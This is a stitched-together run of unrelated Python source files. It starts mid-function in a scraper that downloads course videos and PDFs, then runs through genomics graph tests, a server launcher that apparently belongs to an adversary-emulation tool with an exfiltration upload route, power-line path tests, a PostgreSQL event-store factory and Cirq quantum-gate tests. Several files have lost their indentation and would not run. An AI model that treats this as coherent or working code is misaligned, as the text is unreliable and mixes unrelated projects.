    """Resolve a resource's address and download it into WORK_DIR.

    Videos are queued for external download; documents are fetched as
    PDFs; rich text is written out as an HTML file.
    """
    file_name = resource.file_name
    if resource.type == 'Video':
        ext = '.mp4'
        if not WORK_DIR.need_download(file_name + ext, CONFIG["overwrite"]):
            return
        resource.ext = ext
        FILES['renamer'].write(
            re.search(r'(\w+\.mp4)', resource.meta).group(1), file_name, ext)
        FILES['video'].write_string(resource.meta)
        VIDEOS.append((resource.meta, file_name + ext))
    elif resource.type == 'Document':
        if WORK_DIR.need_download(file_name + ".pdf", CONFIG["overwrite"]):
            CANDY.download_bin(resource.meta, WORK_DIR.file(file_name + '.pdf'))
    elif resource.type == 'Rich':
        if WORK_DIR.need_download(file_name + ".html", CONFIG["overwrite"]):
            with open(WORK_DIR.file(file_name + '.html'), 'w', encoding='utf_8') as html_file:
                html_file.write(resource.meta)
def get_resource(course_id):
    """Walk every chapter/lesson and collect videos, PDFs and tests."""
    outline = Outline()
    counter = Counter()
    video_list = []
    pdf_list = []
    test_list = []
    study_soup = CONFIG['study_soup']
    chapter_names = CONFIG['chapter_names']
    study_div = study_soup.find('div', class_='ation-a-main')
    left_div = study_div.find('div', class_='xx-main-left')
    info_div = left_div.find('div', class_='xx-left-main')
    chapters = info_div.find_all('dl')
    for chapter in chapters:
        counter.add(0)
        # chapter_names was built in reversed order by get_summary, so
        # pop() yields chapters in document order.
        chapter_name = chapter_names.pop()
        outline.write(chapter_name, counter, 0)
        lessons = chapter.find_all('dd')
        for lesson in lessons:
            counter.add(1)
            lesson_info = lesson.find('a')
            # The lesson id is embedded in an onclick="xsxx('<id>')" handler.
            lesson_id = re.search(r"xsxx\('(?P<lesson_id>.+)'\)",
                                  lesson_info.attrs.get('onclick')).group('lesson_id')
            data = {
                'kcdm': course_id,
                'zjdm': lesson_id,
            }
            res = CANDY.post(CONFIG['study_page'], data=data)
            soup = BeautifulSoup(res.text, 'html.parser')
            study_div = soup.find('div', class_='ation-a-main')
            right_div = study_div.find('div', class_='xx-main-right')
            study_box = right_div.find('div', class_='xx-main-box')
            lesson_name = study_box.find('h4').contents[1]
            outline.write(lesson_name, counter, 1)
            resource_div = study_box.find('div', class_='study-L-text')
            # GET video url
            video_div = resource_div.find('div', id='videoBj_1')
            if video_div:
                video_url = video_div.find('input', id='sp').attrs.get('value')
                video_name = 'Video:{}'.format(lesson_name)
                outline.write(video_name, counter, 2, sign='#')
                video_list.append(Video(counter, video_name, video_url))
            # GET pdf url
            pdf_iframe = resource_div.find(
                'iframe', attrs={'name': 'pdfContainer'})
            if pdf_iframe:
                pdf_div = pdf_iframe.parent
                pdf_name = pdf_div.find('span').string.replace('.pdf', '')
                pdf_url = re.search(
                    r'cclj=(?P<pdf_url>http.+\.pdf)', pdf_iframe.attrs.get('src')).group('pdf_url')
                outline.write(pdf_name, counter, 2, sign='*')
                if CONFIG['doc']:
                    pdf_list.append(Document(counter, pdf_name, pdf_url))
            # GET test text
            test_div = study_box.find('div', class_='zy-a-list')
            if test_div:
                test_name = 'Test:{}'.format(lesson_name)
                outline.write(test_name, counter, 2, sign='+')
                if CONFIG['text']:
                    test_list.append(
                        RichText(counter, test_name, str(test_div)))
    if video_list:
        rename = WORK_DIR.file('Names.txt') if CONFIG['rename'] else False
        WORK_DIR.change('Videos')
        playlist = get_playlist(CONFIG["playlist_type"], CONFIG["playlist_path_type"])
        if playlist:
            parse_res_list(video_list, rename, playlist.write, parse_resource)
        else:
            parse_res_list(video_list, rename, parse_resource)
    if pdf_list:
        WORK_DIR.change('PDFs')
        parse_res_list(pdf_list, None, parse_resource)
    if test_list:
        WORK_DIR.change('Texts')
        parse_res_list(test_list, None, parse_resource)
def start(url, config, cookies=None):
    """Entry point invoked by the moocs framework for this site."""
    # Initial setup
    global WORK_DIR
    CANDY.set_cookies(cookies)
    CONFIG.update(config)
    CONFIG['study_page'] = 'http://www.livedu.com.cn/ispace4.0/moocxsxx/queryAllZjByKcdm.do'
    # Course information
    course_info = get_summary(url)
    # Create the course directory tree
    WORK_DIR = WorkingDir(CONFIG['dir'], course_info[1])
    WORK_DIR.change('Videos')
    FILES['renamer'] = Renamer(WORK_DIR.file('Rename.{ext}'))
    FILES['video'] = ClassicFile(WORK_DIR.file('Videos.txt'))
    # Fetch all resources
    get_resource(course_info[0])
    exports.update({
        "workdir": WORK_DIR,
        "spider": CANDY,
        "videos": VIDEOS
    })
|
import unittest
from offsetbasedgraph import GraphWithReversals as Graph, Block, \
DirectedInterval as Interval
from graph_peak_caller import Configuration
from graph_peak_caller.sample import get_fragment_pileup
from graph_peak_caller.intervals import Intervals
from util import from_intervals
class Tester(unittest.TestCase):
    """Shared machinery: derive reads from fragments, build the pileup,
    and compare it against a hand-built expected pileup.

    Subclasses provide set_graph(), fragment_length() and read_length().
    """

    def _create_reads(self):
        # For each fragment, emulate paired-end reads: a forward read from
        # the fragment start and a reversed read from the fragment end.
        self.sample_reads = []
        for fragment in self.fragments:
            fragment.graph = self.graph
            left_sub = fragment.get_subinterval(0, self.read_length())
            self.sample_reads.append(left_sub)
            right_sub = fragment.get_subinterval(
                self.fragment_length() - self.read_length(),
                self.fragment_length())
            right_sub_reverse = right_sub.get_reverse()
            self.sample_reads.append(right_sub_reverse)
    def assert_final_pileup_equals_correct_pileup(self):
        found_pileup = self.fragment_pileup.get_sparse_values()
        correct_pileup = self.correct_pileup.get_sparse_values()
        print("Found pileup")
        print(found_pileup)
        print("Correct pileup")
        print(correct_pileup)
        self.assertTrue(found_pileup == correct_pileup)
    def setUp(self):
        # set_graph() is implemented by each concrete test class.
        self.set_graph()
    def run_callpeaks(self):
        """Build sample reads and run the fragment pileup under test."""
        self._create_reads()
        for read in self.sample_reads:
            print(read)
        self.graph_size = sum(block.length() for block in
                              self.graph.blocks.values())
        config = Configuration()
        config.fragment_length = self.fragment_length()
        config.read_length = self.read_length()
        self.fragment_pileup = get_fragment_pileup(
            self.graph, Intervals(self.sample_reads),
            config)
    def do_asserts(self):
        """Run the pileup and check it against self.correct_pileup."""
        self.run_callpeaks()
        self.assert_final_pileup_equals_correct_pileup()
class TestCase(Tester):
    """Abstract base for the concrete graph scenarios below.

    Subclasses must supply the graph plus the fragment/read geometry.
    """

    def set_graph(self):
        """Build ``self.graph`` for the scenario."""
        raise NotImplementedError

    def get_correct_extended_pileup(self):
        """Return the expected extended pileup."""
        raise NotImplementedError

    def fragment_length(self):
        """Length of a full fragment."""
        raise NotImplementedError

    def read_length(self):
        """Length of a single read."""
        raise NotImplementedError
class TestLinearGraph(TestCase):
    """Two 5 bp blocks joined into a simple line."""

    def read_length(self):
        return 2

    def fragment_length(self):
        return 5

    def set_graph(self):
        self.graph = Graph({1: Block(5), 2: Block(5)}, {1: [2]})

    def test_single_fragment(self):
        self.fragments = [Interval(3, 3, [1, 2])]
        # The single fragment is covered twice (once per read direction).
        expected = [
            Interval(3, 3, [1, 2]),
            Interval(3, 3, [1, 2]),
        ]
        self.correct_pileup = from_intervals(self.graph, expected)
        self.do_asserts()

    def test_two_fragments(self):
        self.fragments = [
            Interval(0, 5, [1]),
            Interval(3, 3, [1, 2]),
        ]
        expected = [
            Interval(3, 3, [1, 2]),
            Interval(3, 3, [1, 2]),
            Interval(0, 5, [1]),
            Interval(0, 5, [1]),
        ]
        self.correct_pileup = from_intervals(self.graph, expected)
        self.do_asserts()
class TestLinearGraphFullNodeCovered(TestCase):
    """Three-block line where one fragment spans every node completely."""

    def read_length(self):
        return 5

    def fragment_length(self):
        return 15

    def set_graph(self):
        blocks = {1: Block(5), 2: Block(5), 3: Block(5)}
        self.graph = Graph(blocks, {1: [2], 2: [3]})

    def test_single_fragment(self):
        self.fragments = [Interval(0, 5, [1, 2, 3])]
        expected = [
            Interval(0, 5, [1, 2, 3]),
            Interval(0, 5, [1, 2, 3]),
        ]
        self.correct_pileup = from_intervals(self.graph, expected)
        self.do_asserts()
class TestSplitGraph(TestCase):
    """Diamond graph: node 1 splits into 2 and 3, which rejoin at node 4."""

    def read_length(self):
        return 5

    def fragment_length(self):
        return 15

    def set_graph(self):
        blocks = {1: Block(5), 2: Block(5), 3: Block(5), 4: Block(5)}
        self.graph = Graph(blocks, {1: [2, 3], 2: [4], 3: [4]})

    def test_single_fragment(self):
        self.fragments = [Interval(0, 5, [1, 2, 4])]
        # With read length 5 the extension also covers the alternative branch.
        expected = [
            Interval(0, 5, [1, 2, 4]),
            Interval(0, 5, [1, 2, 4]),
            Interval(0, 5, [3]),
            Interval(0, 5, [3]),
        ]
        self.correct_pileup = from_intervals(self.graph, expected)
        self.do_asserts()
class TestSplitGraph2(TestCase):
    """Same diamond graph, but the longer reads keep the pileup on one branch."""

    def read_length(self):
        return 6

    def fragment_length(self):
        return 15

    def set_graph(self):
        blocks = {1: Block(5), 2: Block(5), 3: Block(5), 4: Block(5)}
        self.graph = Graph(blocks, {1: [2, 3], 2: [4], 3: [4]})

    def test_single_fragment(self):
        self.fragments = [Interval(0, 5, [1, 2, 4])]
        expected = [
            Interval(0, 5, [1, 2, 4]),
            Interval(0, 5, [1, 2, 4]),
        ]
        self.correct_pileup = from_intervals(self.graph, expected)
        self.do_asserts()
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
import argparse
import asyncio
import logging
import pathlib
import sys
import yaml
from aiohttp import web
from app.api.rest_api import RestApi
from app.service.app_svc import AppService
from app.service.auth_svc import AuthService
from app.service.contact_svc import ContactService
from app.service.data_svc import DataService
from app.service.file_svc import FileSvc
from app.service.planning_svc import PlanningService
from app.service.rest_svc import RestService
def set_logging_state():
    """Quiet noisy third-party loggers; raise everything to DEBUG when configured.

    Reads the module-global ``cfg`` (the parsed YAML configuration).
    """
    for noisy in ('aiohttp.access', 'aiohttp_session', 'aiohttp.server', 'asyncio'):
        logging.getLogger(noisy).setLevel(logging.FATAL)
    if cfg['debug']:
        # '' names the root logger.
        for verbose in ('', 'aiohttp.server', 'asyncio'):
            logging.getLogger(verbose).setLevel(logging.DEBUG)
    logging.debug('Agents will be considered untrusted after %s seconds of silence' % cfg['untrusted_timer'])
    logging.debug('Uploaded files will be put in %s' % cfg['exfil_dir'])
    logging.debug('Serving at http://%s:%s' % (cfg['host'], cfg['port']))
async def build_docs():
    """Rebuild the Sphinx HTML documentation, logging a warning on failure."""
    proc = await asyncio.create_subprocess_exec(
        'sphinx-build', 'docs/', 'docs/_build/html', '-b', 'html', '-c', 'docs/',
        stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
    _, stderr = await proc.communicate()
    if proc.returncode == 0:
        logging.info('Successfully rebuilt documentation.')
        return
    logging.warning('Unable to refresh docs')
    if cfg['debug']:
        # Surface the sphinx error output only in debug mode.
        logging.debug(stderr)
async def start_server(config, services):
    """Attach auth, file routes and static docs to the app, then start serving.

    :param config: Parsed YAML configuration (expects 'users', 'host', 'port').
    :param services: Service registry produced by AppService.get_services().
    """
    app = services.get('app_svc').application
    # NOTE(review): this uses the module-global auth_svc rather than the
    # services registry -- confirm auth_svc is always created before this runs.
    await auth_svc.apply(app, config['users'])
    app.router.add_route('*', '/file/download', services.get('file_svc').download)
    app.router.add_route('POST', '/file/upload', services.get('file_svc').upload_exfil)
    app.router.add_static('/docs/', 'docs/_build/html', append_version=True)
    runner = web.AppRunner(app)
    await runner.setup()
    await web.TCPSite(runner, config['host'], config['port']).start()
def main(services, config):
    """Restore state, start background tasks and run the server loop forever.

    The run_until_complete/create_task ordering is deliberate: state and
    plugins must be loaded before the REST API and background tasks run.
    On Ctrl-C the object store is persisted before shutdown.
    """
    loop = asyncio.get_event_loop()
    loop.run_until_complete(data_svc.restore_state())
    loop.run_until_complete(RestApi(services).enable())
    loop.run_until_complete(app_svc.load_plugins())
    loop.run_until_complete(data_svc.load_data(directory='data'))
    # Fire-and-forget background tasks; they run once the loop starts.
    loop.create_task(build_docs())
    loop.create_task(app_svc.start_sniffer_untrusted_agents())
    loop.create_task(app_svc.resume_operations())
    loop.create_task(app_svc.run_scheduler())
    loop.run_until_complete(start_server(config, services))
    try:
        print('All systems ready. Navigate to http://%s:%s to log in.' % (config['host'], config['port']))
        loop.run_forever()
    except KeyboardInterrupt:
        # Persist the object store so the next start can restore_state().
        loop.run_until_complete(services.get('data_svc').save_state())
        logging.debug('[!] shutting down server...good-bye')
if __name__ == '__main__':
    sys.path.append('')
    parser = argparse.ArgumentParser('Welcome to the system')
    parser.add_argument('-E', '--environment', required=False, default='local', help='Select an env. file to use')
    parser.add_argument('--fresh', action='store_true', required=False, default=False,
                        help='remove object_store on start')
    args = parser.parse_args()
    # Fall back to the default config when the requested env file is missing.
    config = args.environment if pathlib.Path('conf/%s.yml' % args.environment).exists() else 'default'
    with open('conf/%s.yml' % config) as c:
        cfg = yaml.load(c, Loader=yaml.FullLoader)
    set_logging_state()
    # Instantiate all services; AppService collects them into a registry.
    data_svc = DataService()
    contact_svc = ContactService()
    planning_svc = PlanningService()
    rest_svc = RestService()
    auth_svc = AuthService(cfg['api_key'])
    file_svc = FileSvc(cfg['exfil_dir'])
    app_svc = AppService(application=web.Application(), config=cfg)
    if args.fresh:
        # --fresh wipes the persisted object store before startup.
        asyncio.get_event_loop().run_until_complete(data_svc.destroy())
    main(config=cfg, services=app_svc.get_services())
|
<filename>power_planner/graphs/tests/test_ksp.py
import unittest
import numpy as np
from types import SimpleNamespace
from power_planner.graphs.weighted_ksp import WeightedKSP
from power_planner.graphs.implicit_lg import ImplicitLG
from power_planner.ksp import KSP
class TestKsp(unittest.TestCase):
    """Tests k-shortest-path computation on weighted and implicit graphs."""

    expl_shape = (50, 50)
    start_inds = np.array([6, 6])
    dest_inds = np.array([44, 40])
    # create configuration
    cfg = SimpleNamespace()
    cfg.PYLON_DIST_MIN = 3
    cfg.PYLON_DIST_MAX = 5
    cfg.start_inds = start_inds
    cfg.dest_inds = dest_inds
    cfg.ANGLE_WEIGHT = 0.25
    cfg.EDGE_WEIGHT = 0
    cfg.MAX_ANGLE = np.pi / 2
    cfg.MAX_ANGLE_LG = np.pi / 4
    cfg.layer_classes = ["dummy_class"]
    cfg.class_weights = [1]
    # construct random cost surface to assure that lg and impl output same
    example3 = np.random.rand(*expl_shape)
    # construct hard_cons with padding
    hard_cons = np.ones(expl_shape)
    hard_cons[:, :5] = 0
    hard_cons[:, -5:] = 0
    hard_cons[:5, :] = 0
    hard_cons[-5:, :] = 0

    def test_ksp(self) -> None:
        """Single SP optimality plus dispersion-KSP cost/endpoint invariants."""
        wg = WeightedKSP(np.array([self.example3]), self.hard_cons, verbose=0)
        bestpath, _, best_cost_sum = wg.single_sp(**vars(self.cfg))
        wg.get_shortest_path_tree()
        best2, _, best_cost_sum2 = wg.transform_path(wg.best_path)
        # assert that SP tree path is optimal one
        for b in range(len(best2)):
            self.assertListEqual(list(best2[b]), list(bestpath[b]))
        self.assertEqual(best_cost_sum, best_cost_sum2)
        # TEST DIVERSE
        ksp = wg.dispersion_ksp(
            9, cost_thresh=1.05, dist_mode="eucl_mean", count_thresh=3
        )
        for k in ksp:
            path = k[0]
            self.assertListEqual(list(self.start_inds), list(path[0]))
            self.assertListEqual(list(self.dest_inds), list(path[-1]))
            cost = k[2]
            # print(k[1])
            self.assertLessEqual(cost, best_cost_sum * 1.05)
        # TEST LC KSP
        # ksp = graph.k_shortest_paths(source_v, target_v, cfg.KSP)
        # TODO

    def compare_ksp(self) -> None:
        """Compare KSP output of the implicit line graph and the weighted graph."""
        # get impl lg ksp
        impl_lg = ImplicitLG(
            np.array([self.example3]), self.hard_cons, verbose=0
        )
        _ = impl_lg.sp_trees(**vars(self.cfg))
        ksp = KSP(impl_lg)
        ksp_lg = ksp.find_ksp(10)
        # get weighted ksp
        wg_graph = WeightedKSP(
            np.array([self.example3]), self.hard_cons, verbose=0
        )
        # Bug fix: this previously called single_sp on the undefined name `wg`
        # (a NameError); the weighted graph here is `wg_graph`. A dead local
        # `max_angle_lg = np.pi` was also removed -- it was never used.
        _, _, _ = wg_graph.single_sp(**vars(self.cfg))
        wg_graph.get_shortest_path_tree()
        ksp_wg = wg_graph.find_ksp(10)
        for k in range(10):
            path1 = ksp_wg[k][0]
            path2 = ksp_lg[k][0]
            for p in range(len(path1)):
                self.assertListEqual(list(path1[p]), list(path2[p]))
        # # test that all fulfill hard constraints
        # paths = [k[0] for k in ksp]
        # for p in paths:
        #     p = np.array(p)
        #     plt.scatter(p[:,1], p[:,0])
        #     for (i,j) in p:
        #         self.assertEqual(instance_corr[i,j],0)
if __name__ == "__main__":
unittest.main()
|
<filename>packages/plugins/minos-database-aiopg/minos/plugins/aiopg/factories/aggregate/events.py<gh_stars>100-1000
from collections.abc import (
Iterable,
)
from datetime import (
datetime,
)
from typing import (
Any,
Optional,
)
from uuid import (
UUID,
)
from psycopg2.sql import (
SQL,
Composable,
Identifier,
Literal,
Placeholder,
)
from minos.aggregate import (
Action,
EventDatabaseOperationFactory,
)
from minos.common import (
ComposedDatabaseOperation,
DatabaseOperation,
)
from ...clients import (
AiopgDatabaseClient,
)
from ...operations import (
AiopgDatabaseOperation,
)
# noinspection SqlNoDataSourceInspection,SqlResolve,PyMethodMayBeStatic
class AiopgEventDatabaseOperationFactory(EventDatabaseOperationFactory):
    """Aiopg Event Database Operation Factory class."""

    def build_table_name(self) -> str:
        """Get the table name.

        :return: A ``str`` value.
        """
        return "aggregate_event"

    def build_create(self) -> DatabaseOperation:
        """Build the database operation to create the event table.

        :return: A ``DatabaseOperation`` instance.
        """
        return ComposedDatabaseOperation(
            [
                AiopgDatabaseOperation(
                    'CREATE EXTENSION IF NOT EXISTS "uuid-ossp";',
                    lock="uuid-ossp",
                ),
                # Create the action_type enum only if it does not exist yet
                # (CREATE TYPE has no IF NOT EXISTS clause).
                AiopgDatabaseOperation(
                    """
                    DO
                    $$
                        BEGIN
                            IF NOT EXISTS(SELECT *
                                          FROM pg_type typ
                                                   INNER JOIN pg_namespace nsp
                                                              ON nsp.oid = typ.typnamespace
                                          WHERE nsp.nspname = current_schema()
                                            AND typ.typname = 'action_type') THEN
                                CREATE TYPE action_type AS ENUM ('create', 'update', 'delete');
                            END IF;
                        END;
                    $$
                    LANGUAGE plpgsql;
                    """,
                    lock=self.build_table_name(),
                ),
                AiopgDatabaseOperation(
                    f"""
                    CREATE TABLE IF NOT EXISTS {self.build_table_name()} (
                        id BIGSERIAL PRIMARY KEY,
                        action ACTION_TYPE NOT NULL,
                        uuid UUID NOT NULL,
                        name TEXT NOT NULL,
                        version INT NOT NULL,
                        data BYTEA NOT NULL,
                        created_at TIMESTAMPTZ NOT NULL,
                        transaction_uuid UUID NOT NULL DEFAULT uuid_nil(),
                        UNIQUE (uuid, version, transaction_uuid)
                    );
                    """,
                    lock=self.build_table_name(),
                ),
            ]
        )

    def build_submit(
        self,
        transaction_uuids: Iterable[UUID],
        uuid: UUID,
        action: Action,
        name: str,
        version: int,
        data: bytes,
        created_at: datetime,
        transaction_uuid: UUID,
        lock: Optional[str],
        **kwargs,
    ) -> DatabaseOperation:
        """Build the database operation to submit a row into the event table.

        :param transaction_uuids: The sequence of nested transaction in on top of the current event's transaction.
        :param uuid: The identifier of the entity.
        :param action: The action of the event.
        :param name: The name of the entity.
        :param version: The version of the entity
        :param data: The data of the event.
        :param created_at: The creation datetime.
        :param transaction_uuid: The identifier of the transaction.
        :param lock: The lock identifier.
        :param kwargs: Additional named arguments.
        :return: A ``DatabaseOperation`` instance.
        """
        # Missing uuid/version/created_at values are filled in by the database:
        # a fresh uuid, the next version for the entity, and NOW() respectively.
        insert_values = SQL(
            """
            INSERT INTO {table_name} (id, action, uuid, name, version, data, created_at, transaction_uuid)
            VALUES (
                default,
                %(action)s,
                CASE %(uuid)s WHEN uuid_nil() THEN uuid_generate_v4() ELSE %(uuid)s END,
                %(name)s,
                (
                    SELECT (CASE WHEN %(version)s IS NULL THEN 1 + COALESCE(MAX(t2.version), 0) ELSE %(version)s END)
                    FROM (
                             SELECT DISTINCT ON (t1.uuid) t1.version
                             FROM ( {from_parts} ) AS t1
                             ORDER BY t1.uuid, t1.transaction_index DESC
                         ) AS t2
                ),
                %(data)s,
                (CASE WHEN %(created_at)s IS NULL THEN NOW() ELSE %(created_at)s END),
                %(transaction_uuid)s
            )
            RETURNING id, uuid, version, created_at;
            """
        )
        insert_parameters = {
            "uuid": uuid,
            "action": action,
            "name": name,
            "version": version,
            "data": data,
            "created_at": created_at,
            "transaction_uuid": transaction_uuid,
        }
        from_sql, from_parameters = self._build_submit_from(transaction_uuids)
        query = insert_values.format(from_parts=from_sql, table_name=Identifier(self.build_table_name()))
        parameters = from_parameters | insert_parameters
        return AiopgDatabaseOperation(query, parameters, lock)

    def _build_submit_from(self, transaction_uuids: Iterable[UUID]) -> tuple[Composable, dict[str, Any]]:
        # Build one SELECT per (outer-to-inner) transaction; the enumeration
        # index lets the caller pick the innermost matching version.
        select_transaction = SQL(
            """
            SELECT {index} AS transaction_index, uuid, MAX(version) AS version
            FROM {table_name}
            WHERE uuid = %(uuid)s AND transaction_uuid = {transaction_uuid}
            GROUP BY uuid
            """
        )
        from_query_parts = list()
        parameters = dict()
        for index, transaction_uuid in enumerate(transaction_uuids, start=1):
            name = f"transaction_uuid_{index}"
            parameters[name] = transaction_uuid
            from_query_parts.append(
                select_transaction.format(
                    index=Literal(index),
                    transaction_uuid=Placeholder(name),
                    table_name=Identifier(self.build_table_name()),
                ),
            )
        query = SQL(" UNION ALL ").join(from_query_parts)
        return query, parameters

    # noinspection PyShadowingBuiltins
    def build_query(
        self,
        uuid: Optional[UUID] = None,
        name: Optional[str] = None,
        version: Optional[int] = None,
        version_lt: Optional[int] = None,
        version_gt: Optional[int] = None,
        version_le: Optional[int] = None,
        version_ge: Optional[int] = None,
        id: Optional[int] = None,
        id_lt: Optional[int] = None,
        id_gt: Optional[int] = None,
        id_le: Optional[int] = None,
        id_ge: Optional[int] = None,
        transaction_uuid: Optional[UUID] = None,
        transaction_uuid_ne: Optional[UUID] = None,
        transaction_uuid_in: Optional[Iterable[UUID]] = None,
        **kwargs,
    ) -> DatabaseOperation:
        """Build the database operation to select rows.

        :param uuid: The identifier must be equal to the given value.
        :param name: The classname must be equal to the given value.
        :param version: The version must be equal to the given value.
        :param version_lt: The version must be lower than the given value.
        :param version_gt: The version must be greater than the given value.
        :param version_le: The version must be lower or equal to the given value.
        :param version_ge: The version must be greater or equal to the given value.
        :param id: The entry identifier must be equal to the given value.
        :param id_lt: The entry identifier must be lower than the given value.
        :param id_gt: The entry identifier must be greater than the given value.
        :param id_le: The entry identifier must be lower or equal to the given value.
        :param id_ge: The entry identifier must be greater or equal to the given value.
        :param transaction_uuid: The transaction identifier must be equal to the given value.
        :param transaction_uuid_ne: The transaction identifier must be distinct of the given value.
        :param transaction_uuid_in: The destination transaction identifier must be equal to one of the given values.
        :param kwargs: Additional named arguments.
        :return: A ``DatabaseOperation`` instance.
        """
        if transaction_uuid_in is not None:
            # Materialize so psycopg2 can adapt it as a SQL tuple for IN (...).
            transaction_uuid_in = tuple(transaction_uuid_in)
        _select_all = f"""
        SELECT uuid, name, version, data, id, action, created_at, transaction_uuid
        FROM {self.build_table_name()}
        """
        conditions = list()
        if uuid is not None:
            conditions.append("uuid = %(uuid)s")
        if name is not None:
            conditions.append("name = %(name)s")
        if version is not None:
            conditions.append("version = %(version)s")
        if version_lt is not None:
            conditions.append("version < %(version_lt)s")
        if version_gt is not None:
            conditions.append("version > %(version_gt)s")
        if version_le is not None:
            conditions.append("version <= %(version_le)s")
        if version_ge is not None:
            conditions.append("version >= %(version_ge)s")
        if id is not None:
            conditions.append("id = %(id)s")
        if id_lt is not None:
            conditions.append("id < %(id_lt)s")
        if id_gt is not None:
            conditions.append("id > %(id_gt)s")
        if id_le is not None:
            conditions.append("id <= %(id_le)s")
        if id_ge is not None:
            conditions.append("id >= %(id_ge)s")
        if transaction_uuid is not None:
            conditions.append("transaction_uuid = %(transaction_uuid)s")
        if transaction_uuid_ne is not None:
            conditions.append("transaction_uuid <> %(transaction_uuid_ne)s")
        if transaction_uuid_in is not None:
            conditions.append("transaction_uuid IN %(transaction_uuid_in)s")
        if not conditions:
            return AiopgDatabaseOperation(f"{_select_all} ORDER BY id;")
        return AiopgDatabaseOperation(
            f"{_select_all} WHERE {' AND '.join(conditions)} ORDER BY id;",
            {
                "uuid": uuid,
                "name": name,
                "version": version,
                "version_lt": version_lt,
                "version_gt": version_gt,
                "version_le": version_le,
                "version_ge": version_ge,
                "id": id,
                "id_lt": id_lt,
                "id_gt": id_gt,
                "id_le": id_le,
                "id_ge": id_ge,
                "transaction_uuid": transaction_uuid,
                "transaction_uuid_ne": transaction_uuid_ne,
                "transaction_uuid_in": transaction_uuid_in,
            },
        )

    def build_query_offset(self) -> DatabaseOperation:
        """Build the database operation to get the maximum identifier.

        :return: A ``DatabaseOperation`` instance.
        """
        return AiopgDatabaseOperation(f"SELECT MAX(id) FROM {self.build_table_name()};".strip())
AiopgDatabaseClient.set_factory(EventDatabaseOperationFactory, AiopgEventDatabaseOperationFactory)
|
<gh_stars>0
# Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union, Tuple, cast
import itertools
import numpy as np
import pytest
import sympy
import cirq
from cirq import protocols
from cirq.type_workarounds import NotImplementedType
class GateUsingWorkspaceForApplyUnitary(cirq.SingleQubitGate):
    """Identity gate whose _apply_unitary_ returns the scratch buffer.

    Exercises the code path where an operation writes its result into
    ``available_buffer`` instead of mutating ``target_tensor`` in place.
    """

    def _apply_unitary_(self, args: cirq.ApplyUnitaryArgs) -> Union[np.ndarray, NotImplementedType]:
        # Copy the state into the workspace, wipe the target, hand back the workspace.
        args.available_buffer[...] = args.target_tensor
        args.target_tensor[...] = 0
        return args.available_buffer

    def _unitary_(self):
        return np.eye(2)

    def __eq__(self, other):
        return isinstance(other, type(self))

    def __repr__(self):
        return 'cirq.ops.controlled_operation_test.GateUsingWorkspaceForApplyUnitary()'
class GateAllocatingNewSpaceForResult(cirq.SingleQubitGate):
    """Gate with unitary [[2,3],[5,7]] that allocates a brand-new result tensor.

    Exercises the code path where _apply_unitary_ returns freshly allocated
    memory rather than either of the provided buffers.
    """

    def _apply_unitary_(self, args: cirq.ApplyUnitaryArgs) -> Union[np.ndarray, NotImplementedType]:
        assert len(args.axes) == 1
        axis = args.axes[0]
        # Index prefixes selecting the |0> and |1> slices along the acted-on axis.
        prefix = cast(Tuple[Union[int, slice, 'ellipsis'], ...], (slice(None),))
        idx0 = prefix * axis + (0, Ellipsis)
        idx1 = prefix * axis + (1, Ellipsis)
        out = np.zeros(args.target_tensor.shape, args.target_tensor.dtype)
        out[idx0] = args.target_tensor[idx0] * 2 + args.target_tensor[idx1] * 3
        out[idx1] = args.target_tensor[idx0] * 5 + args.target_tensor[idx1] * 7
        return out

    def _unitary_(self):
        return np.array([[2, 3], [5, 7]])

    def __eq__(self, other):
        return isinstance(other, type(self))

    def __repr__(self):
        return 'cirq.ops.controlled_operation_test.GateAllocatingNewSpaceForResult()'
def test_controlled_operation_init():
    """ControlledOperation constructor: defaults, explicit values, qudits, errors."""
    cb = cirq.NamedQubit('ctr')
    q = cirq.NamedQubit('q')
    g = cirq.SingleQubitGate()
    v = cirq.GateOperation(g, (q,))
    # Default control value is 1.
    c = cirq.ControlledOperation([cb], v)
    assert c.sub_operation == v
    assert c.controls == (cb,)
    assert c.qubits == (cb, q)
    assert c == c.with_qubits(cb, q)
    assert c.control_values == ((1,),)
    assert cirq.qid_shape(c) == (2, 2)
    # Explicit control value 0.
    c = cirq.ControlledOperation([cb], v, control_values=[0])
    assert c.sub_operation == v
    assert c.controls == (cb,)
    assert c.qubits == (cb, q)
    assert c == c.with_qubits(cb, q)
    assert c.control_values == ((0,),)
    assert cirq.qid_shape(c) == (2, 2)
    # Qutrit control.
    c = cirq.ControlledOperation([cb.with_dimension(3)], v)
    assert c.sub_operation == v
    assert c.controls == (cb.with_dimension(3),)
    assert c.qubits == (cb.with_dimension(3), q)
    assert c == c.with_qubits(cb.with_dimension(3), q)
    assert c.control_values == ((1,),)
    assert cirq.qid_shape(c) == (3, 2)
    # Mismatched or out-of-range control values are rejected.
    with pytest.raises(ValueError, match=r'len\(control_values\) != len\(controls\)'):
        _ = cirq.ControlledOperation([cb], v, control_values=[1, 1])
    with pytest.raises(ValueError, match='Control values .*outside of range'):
        _ = cirq.ControlledOperation([cb], v, control_values=[2])
    with pytest.raises(ValueError, match='Control values .*outside of range'):
        _ = cirq.ControlledOperation([cb], v, control_values=[(1, -1)])
def test_controlled_operation_eq():
    """Equality depends on controls, sub-operation, and control values -- not order."""
    ctrl_a = cirq.NamedQubit('c1')
    qubit = cirq.NamedQubit('q1')
    ctrl_b = cirq.NamedQubit('c2')
    tester = cirq.testing.EqualsTester()
    tester.make_equality_group(lambda: cirq.ControlledOperation([ctrl_a], cirq.X(qubit)))
    tester.make_equality_group(lambda: cirq.ControlledOperation([ctrl_b], cirq.X(qubit)))
    tester.make_equality_group(lambda: cirq.ControlledOperation([ctrl_a], cirq.Z(qubit)))
    tester.add_equality_group(cirq.ControlledOperation([ctrl_b], cirq.Z(qubit)))
    # The ordering of the control qubits does not affect equality.
    tester.add_equality_group(
        cirq.ControlledOperation([ctrl_a, ctrl_b], cirq.Z(qubit)),
        cirq.ControlledOperation([ctrl_b, ctrl_a], cirq.Z(qubit)),
    )
